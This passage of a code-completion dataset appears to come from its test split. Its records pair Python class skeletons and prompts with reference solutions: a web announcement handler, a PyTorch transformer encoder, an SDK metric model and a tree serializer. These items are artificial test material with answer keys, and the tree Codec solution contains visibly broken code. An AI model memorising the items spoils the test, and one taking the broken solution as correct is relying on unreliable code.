self.write_ret(status)\n<|end_body_0|>\n\n<|body_start_1|>\n        status = ErrorCode.SUCCESS\n        try:\n            delete_ids = map(int, str_to_list(self.get_argument('ids', None)))\n            logging.info('[UWEB] Delete announcement: %s', delete_ids)\n        except Exception as e:\n            status = ErrorCode.ILLEGAL_DATA_FORMAT\n            logging.exception('[UWEB] data format illegal. 
Exception: %s', e.args)\n self.write_ret(status)\n return\n try:\n self.db.execute('DELETE FROM T_ANNOUNCEMENT_LOG WHERE id IN %s', tuple(delete_ids + DUMMY_IDS))\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] Delete announcement failed. Exception: %s', e.args)\n self.write_ret(status)\n<|end_body_1|>\n", "class_docstring": "Record the announcement info. :url /announcement", "class_name": "AnnouncementHandler", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AnnouncementHandler:\n \"\"\"Record the announcement info. :url /announcement\"\"\"\n\n def post(self):\n \"\"\"Insert new items.\"\"\"\n <|body_0|>\n\n def delete(self):\n \"\"\"Delete announcement.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n status = ErrorCode.SUCCESS\n try:\n data = DotDict(json_decode(self.request.body))\n content = data.get('content', '')\n mobiles = data.get('mobiles', None)\n logging.info('[UWEB] Announcement request: %s', data)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n self.write_ret(status)\n return\n try:\n mobiles_ = u''\n if mobiles is not None:\n mobiles_ = ','.join(mobiles)\n for mobile in mobiles:\n SMSHelper.send(mobile, content)\n announcement = dict(cid=self.current_user.cid, content=content, mobiles=mobiles_)\n record_announcement(self.db, announcement)\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] record share failed, Exception: %s', e.args)\n self.write_ret(status)\n<|end_body_0|>\n\n<|body_start_1|>\n status = ErrorCode.SUCCESS\n try:\n delete_ids = map(int, str_to_list(self.get_argument('ids', None)))\n logging.info('[UWEB] Delete announcement: %s', delete_ids)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n logging.exception('[UWEB] data format illegal. Exception: %s', e.args)\n self.write_ret(status)\n return\n try:\n self.db.execute('DELETE FROM T_ANNOUNCEMENT_LOG WHERE id IN %s', tuple(delete_ids + DUMMY_IDS))\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] Delete announcement failed. Exception: %s', e.args)\n self.write_ret(status)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000268", "length_bytes": 4433, "license_type": "no_license", "methods": [{"docstring": "Insert new items.", "name": "post", "signature": "def post(self)"}, {"docstring": "Delete announcement.", "name": "delete", "signature": "def delete(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001821", "prompt": "Implement the Python class `AnnouncementHandler` described below.\n\nClass description:\nRecord the announcement info. :url /announcement\n\nMethod signatures and docstrings:\n- def post(self): Insert new items.\n- def delete(self): Delete announcement.", "prompted_full_text": "Implement the Python class `AnnouncementHandler` described below.\n\nClass description:\nRecord the announcement info. :url /announcement\n\nMethod signatures and docstrings:\n- def post(self): Insert new items.\n- def delete(self): Delete announcement.\n\n<|skeleton|>\nclass AnnouncementHandler:\n \"\"\"Record the announcement info. 
:url /announcement\"\"\"\n\n def post(self):\n \"\"\"Insert new items.\"\"\"\n <|body_0|>\n\n def delete(self):\n \"\"\"Delete announcement.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n status = ErrorCode.SUCCESS\n try:\n data = DotDict(json_decode(self.request.body))\n content = data.get('content', '')\n mobiles = data.get('mobiles', None)\n logging.info('[UWEB] Announcement request: %s', data)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n self.write_ret(status)\n return\n try:\n mobiles_ = u''\n if mobiles is not None:\n mobiles_ = ','.join(mobiles)\n for mobile in mobiles:\n SMSHelper.send(mobile, content)\n announcement = dict(cid=self.current_user.cid, content=content, mobiles=mobiles_)\n record_announcement(self.db, announcement)\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] record share failed, Exception: %s', e.args)\n self.write_ret(status)\n<|end_body_0|>\n\n<|body_start_1|>\n status = ErrorCode.SUCCESS\n try:\n delete_ids = map(int, str_to_list(self.get_argument('ids', None)))\n logging.info('[UWEB] Delete announcement: %s', delete_ids)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n logging.exception('[UWEB] data format illegal. Exception: %s', e.args)\n self.write_ret(status)\n return\n try:\n self.db.execute('DELETE FROM T_ANNOUNCEMENT_LOG WHERE id IN %s', tuple(delete_ids + DUMMY_IDS))\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] Delete announcement failed. Exception: %s', e.args)\n self.write_ret(status)\n<|end_body_1|>\n", "revision_id": "3b095a325581b1fc48497c234f0ad55e928586a1", "skeleton": "<|skeleton|>\nclass AnnouncementHandler:\n \"\"\"Record the announcement info. :url /announcement\"\"\"\n\n def post(self):\n \"\"\"Insert new items.\"\"\"\n <|body_0|>\n\n def delete(self):\n \"\"\"Delete announcement.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AnnouncementHandler:\n \"\"\"Record the announcement info. :url /announcement\"\"\"\n\n def post(self):\n \"\"\"Insert new items.\"\"\"\n status = ErrorCode.SUCCESS\n try:\n data = DotDict(json_decode(self.request.body))\n content = data.get('content', '')\n mobiles = data.get('mobiles', None)\n logging.info('[UWEB] Announcement request: %s', data)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n self.write_ret(status)\n return\n try:\n mobiles_ = u''\n if mobiles is not None:\n mobiles_ = ','.join(mobiles)\n for mobile in mobiles:\n SMSHelper.send(mobile, content)\n announcement = dict(cid=self.current_user.cid, content=content, mobiles=mobiles_)\n record_announcement(self.db, announcement)\n self.write_ret(status)\n except Exception as e:\n status = ErrorCode.SERVER_BUSY\n logging.exception('[UWEB] record share failed, Exception: %s', e.args)\n self.write_ret(status)\n\n def delete(self):\n \"\"\"Delete announcement.\"\"\"\n status = ErrorCode.SUCCESS\n try:\n delete_ids = map(int, str_to_list(self.get_argument('ids', None)))\n logging.info('[UWEB] Delete announcement: %s', delete_ids)\n except Exception as e:\n status = ErrorCode.ILLEGAL_DATA_FORMAT\n logging.exception('[UWEB] data format illegal. 
Exception: %s', e.args)\n            self.write_ret(status)\n            return\n        try:\n            self.db.execute('DELETE FROM T_ANNOUNCEMENT_LOG WHERE id IN %s', tuple(delete_ids + DUMMY_IDS))\n            self.write_ret(status)\n        except Exception as e:\n            status = ErrorCode.SERVER_BUSY\n            logging.exception('[UWEB] Delete announcement failed. Exception: %s', e.args)\n            self.write_ret(status)\n", "source": "the_stack_v2_python_sparse", "source_path": "apps/uweb/handlers/announcement.py", "source_repo": "jcsy521/ydws", "split": "test", "star_events_count": 0}
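For reference, the JSON body that the post() method in the record above decodes looks like the following sketch. The field names are taken from its data.get calls; the content and phone numbers are made-up placeholders, not values from the record.

import json
body = json.dumps({
    'content': 'Scheduled maintenance at 02:00',  # SMS text sent to each mobile
    'mobiles': ['13800000000', '13900000000'],    # optional recipient list
})
# POST this to /announcement; DELETE /announcement?ids=1,2 removes logged entries.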
{"blob_id": "74bce0dbec2c1a92c40a962f3a099097be735c96", "bodies": ["super().__init__()\nself.input_size = input_size\nself.d_model = d_model\nif input_size != d_model:\n    self.proj = nn.Linear(input_size, d_model)\nlayer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\nself.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])\nself.num_layers = num_layers\nself._reset_parameters()", "output = src.transpose(0, 1)\nif self.input_size != self.d_model:\n    output = self.proj(output)\nfor i in range(self.num_layers):\n    output = self.layers[i](output, memory=memory, src_mask=mask, padding_mask=padding_mask)\nreturn output.transpose(0, 1)", "for p in self.parameters():\n    if p.dim() > 1:\n        nn.init.xavier_uniform_(p)"], "bodies_text": "<|body_start_0|>\n        super().__init__()\n        self.input_size = input_size\n        self.d_model = d_model\n        if input_size != d_model:\n            self.proj = nn.Linear(input_size, d_model)\n        layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\n        self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])\n        self.num_layers = num_layers\n        self._reset_parameters()\n<|end_body_0|>\n\n<|body_start_1|>\n        output = src.transpose(0, 1)\n        if self.input_size != self.d_model:\n            output = self.proj(output)\n        for i in range(self.num_layers):\n            output = self.layers[i](output, memory=memory, src_mask=mask, padding_mask=padding_mask)\n        return output.transpose(0, 1)\n<|end_body_1|>\n\n<|body_start_2|>\n        for p in self.parameters():\n            if p.dim() > 1:\n                nn.init.xavier_uniform_(p)\n<|end_body_2|>\n", "class_docstring": "TransformerEncoder is a stack of N encoder layers.", "class_name": "TransformerEncoder", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TransformerEncoder:\n    \"\"\"TransformerEncoder is a stack of N encoder layers.\"\"\"\n\n    def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None:\n        \"\"\"Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforward dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.\"\"\"\n        <|body_0|>\n\n    def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor:\n        \"\"\"Pass the input through the encoder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). Should be True for tokens to leave untouched, and False for padding tokens.\"\"\"\n        <|body_1|>\n\n    def _reset_parameters(self):\n        \"\"\"Initiate parameters in the transformer model.\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n        super().__init__()\n        self.input_size = input_size\n        self.d_model = d_model\n        if input_size != d_model:\n            self.proj = nn.Linear(input_size, d_model)\n        layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\n        self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])\n        self.num_layers = num_layers\n        self._reset_parameters()\n<|end_body_0|>\n\n<|body_start_1|>\n        output = src.transpose(0, 1)\n        if self.input_size != self.d_model:\n            output = self.proj(output)\n        for i in range(self.num_layers):\n            output = self.layers[i](output, memory=memory, src_mask=mask, padding_mask=padding_mask)\n        return output.transpose(0, 1)\n<|end_body_1|>\n\n<|body_start_2|>\n        for p in self.parameters():\n            if p.dim() > 1:\n                nn.init.xavier_uniform_(p)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000269", "length_bytes": 20460, "license_type": "permissive", "methods": [{"docstring": "Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforward dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.", "name": "__init__", "signature": "def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None"}, {"docstring": "Pass the input through the encoder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). Should be True for tokens to leave untouched, and False for padding tokens.", "name": "forward", "signature": "def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor"}, {"docstring": "Initiate parameters in the transformer model.", "name": "_reset_parameters", "signature": "def _reset_parameters(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006934", "prompt": "Implement the Python class `TransformerEncoder` described below.\n\nClass description:\nTransformerEncoder is a stack of N encoder layers.\n\nMethod signatures and docstrings:\n- def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None: Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforward dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.\n- def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor: Pass the input through the encoder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). Should be True for tokens to leave untouched, and False for padding tokens.\n- def _reset_parameters(self): Initiate parameters in the transformer model.", "prompted_full_text": "Implement the Python class `TransformerEncoder` described below.\n\nClass description:\nTransformerEncoder is a stack of N encoder layers.\n\nMethod signatures and docstrings:\n- def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None: Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforward dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.\n- def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor: Pass the input through the encoder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). Should be True for tokens to leave untouched, and False for padding tokens.\n- def _reset_parameters(self): Initiate parameters in the transformer model.\n\n<|skeleton|>\nclass TransformerEncoder:\n    \"\"\"TransformerEncoder is a stack of N encoder layers.\"\"\"\n\n    def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None:\n        \"\"\"Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforward dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.\"\"\"\n        <|body_0|>\n\n    def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor:\n        \"\"\"Pass the input through the encoder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). Should be True for tokens to leave untouched, and False for padding tokens.\"\"\"\n        <|body_1|>\n\n    def _reset_parameters(self):\n        \"\"\"Initiate parameters in the transformer model.\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n        super().__init__()\n        self.input_size = input_size\n        self.d_model = d_model\n        if input_size != d_model:\n            self.proj = nn.Linear(input_size, d_model)\n        layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\n        self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])\n        self.num_layers = num_layers\n        self._reset_parameters()\n<|end_body_0|>\n\n<|body_start_1|>\n        output = src.transpose(0, 1)\n        if self.input_size != self.d_model:\n            output = self.proj(output)\n        for i in range(self.num_layers):\n            output = self.layers[i](output, memory=memory, src_mask=mask, padding_mask=padding_mask)\n        return output.transpose(0, 1)\n<|end_body_1|>\n\n<|body_start_2|>\n        for p in self.parameters():\n            if p.dim() > 1:\n                nn.init.xavier_uniform_(p)\n<|end_body_2|>\n", "revision_id": "0dc2f5b2b286694defe8abf450fe5be9ae12c097", "skeleton": "<|skeleton|>\nclass TransformerEncoder:\n    \"\"\"TransformerEncoder is a stack of N encoder layers.\"\"\"\n\n    def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None:\n        \"\"\"Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforward dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.\"\"\"\n        <|body_0|>\n\n    def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor:\n        \"\"\"Pass the input through the encoder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). Should be True for tokens to leave untouched, and False for padding tokens.\"\"\"\n        <|body_1|>\n\n    def _reset_parameters(self):\n        \"\"\"Initiate parameters in the transformer model.\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TransformerEncoder:\n    \"\"\"TransformerEncoder is a stack of N encoder layers.\"\"\"\n\n    def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None:\n        \"\"\"Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforward dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.\"\"\"\n        super().__init__()\n        self.input_size = input_size\n        self.d_model = d_model\n        if input_size != d_model:\n            self.proj = nn.Linear(input_size, d_model)\n        layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\n        self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])\n        self.num_layers = num_layers\n        self._reset_parameters()\n\n    def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor:\n        \"\"\"Pass the input through the encoder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). 
Should be True for tokens to leave untouched, and False for padding tokens.\"\"\"\n output = src.transpose(0, 1)\n if self.input_size != self.d_model:\n output = self.proj(output)\n for i in range(self.num_layers):\n output = self.layers[i](output, memory=memory, src_mask=mask, padding_mask=padding_mask)\n return output.transpose(0, 1)\n\n def _reset_parameters(self):\n \"\"\"Initiate parameters in the transformer model.\"\"\"\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n", "source": "the_stack_v2_python_sparse", "source_path": "flambe/nn/transformer.py", "source_repo": "cle-ros/flambe", "split": "test", "star_events_count": 1} {"blob_id": "eddf2ead8fe6bd9a355f21e5ae1f12a83ed34bfa", "bodies": ["self.metric_name = metric_name\nself.timestamp_msecs = timestamp_msecs\nself.value = value", "if dictionary is None:\n return None\nmetric_name = dictionary.get('metricName')\ntimestamp_msecs = dictionary.get('timestampMsecs')\nvalue = cohesity_management_sdk.models.value.Value.from_dictionary(dictionary.get('value')) if dictionary.get('value') else None\nreturn cls(metric_name, timestamp_msecs, value)"], "bodies_text": "<|body_start_0|>\n self.metric_name = metric_name\n self.timestamp_msecs = timestamp_msecs\n self.value = value\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n metric_name = dictionary.get('metricName')\n timestamp_msecs = dictionary.get('timestampMsecs')\n value = cohesity_management_sdk.models.value.Value.from_dictionary(dictionary.get('value')) if dictionary.get('value') else None\n return cls(metric_name, timestamp_msecs, value)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). value (Value): Specifies the value of the data point.", "class_name": "MetricValue", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MetricValue:\n \"\"\"Implementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). value (Value): Specifies the value of the data point.\"\"\"\n\n def __init__(self, metric_name=None, timestamp_msecs=None, value=None):\n \"\"\"Constructor for the MetricValue class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.metric_name = metric_name\n self.timestamp_msecs = timestamp_msecs\n self.value = value\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n metric_name = dictionary.get('metricName')\n timestamp_msecs = dictionary.get('timestampMsecs')\n value = cohesity_management_sdk.models.value.Value.from_dictionary(dictionary.get('value')) if dictionary.get('value') else None\n return cls(metric_name, timestamp_msecs, value)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000270", "length_bytes": 2016, "license_type": "permissive", "methods": [{"docstring": "Constructor for the MetricValue class", "name": "__init__", "signature": "def __init__(self, metric_name=None, timestamp_msecs=None, value=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `MetricValue` described below.\n\nClass description:\nImplementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). value (Value): Specifies the value of the data point.\n\nMethod signatures and docstrings:\n- def __init__(self, metric_name=None, timestamp_msecs=None, value=None): Constructor for the MetricValue class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `MetricValue` described below.\n\nClass description:\nImplementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). value (Value): Specifies the value of the data point.\n\nMethod signatures and docstrings:\n- def __init__(self, metric_name=None, timestamp_msecs=None, value=None): Constructor for the MetricValue class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass MetricValue:\n \"\"\"Implementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). 
value (Value): Specifies the value of the data point.\"\"\"\n\n def __init__(self, metric_name=None, timestamp_msecs=None, value=None):\n \"\"\"Constructor for the MetricValue class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.metric_name = metric_name\n self.timestamp_msecs = timestamp_msecs\n self.value = value\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n metric_name = dictionary.get('metricName')\n timestamp_msecs = dictionary.get('timestampMsecs')\n value = cohesity_management_sdk.models.value.Value.from_dictionary(dictionary.get('value')) if dictionary.get('value') else None\n return cls(metric_name, timestamp_msecs, value)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass MetricValue:\n \"\"\"Implementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). value (Value): Specifies the value of the data point.\"\"\"\n\n def __init__(self, metric_name=None, timestamp_msecs=None, value=None):\n \"\"\"Constructor for the MetricValue class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MetricValue:\n \"\"\"Implementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). value (Value): Specifies the value of the data point.\"\"\"\n\n def __init__(self, metric_name=None, timestamp_msecs=None, value=None):\n \"\"\"Constructor for the MetricValue class\"\"\"\n self.metric_name = metric_name\n self.timestamp_msecs = timestamp_msecs\n self.value = value\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n metric_name = dictionary.get('metricName')\n timestamp_msecs = dictionary.get('timestampMsecs')\n value = cohesity_management_sdk.models.value.Value.from_dictionary(dictionary.get('value')) if dictionary.get('value') else None\n return cls(metric_name, timestamp_msecs, value)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/metric_value.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "b643c161634586c58279fe7d882cae44c8e131ae", "bodies": ["if root is None:\n return ''\nq = []\n\ndef preorder(root):\n if root is None:\n return None\n else:\n q.append(root.val)\n for child in (root, children):\n preorder(child)\n q.append('#')\npreorder(root)\nreturn ','.join(map(str, q))", "if data == '':\n return None\ndata = deque(data.split(','))\nroot = Node(int(data.popleft()), [])\n\ndef solve(root):\n val = data.popleft()\n while val != '#':\n child = Node(int(val, []))\n solve(child)\n root.children.append(child)\n val = data.popleft()\nsolve(root)\nreturn root"], "bodies_text": "<|body_start_0|>\n if root is None:\n return ''\n q = []\n\n def preorder(root):\n if root is None:\n return None\n else:\n q.append(root.val)\n for child in (root, children):\n preorder(child)\n q.append('#')\n preorder(root)\n return ','.join(map(str, q))\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '':\n return None\n data = deque(data.split(','))\n root = Node(int(data.popleft()), [])\n\n def solve(root):\n val = data.popleft()\n while val != '#':\n child = Node(int(val, []))\n solve(child)\n root.children.append(child)\n val = data.popleft()\n solve(root)\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n 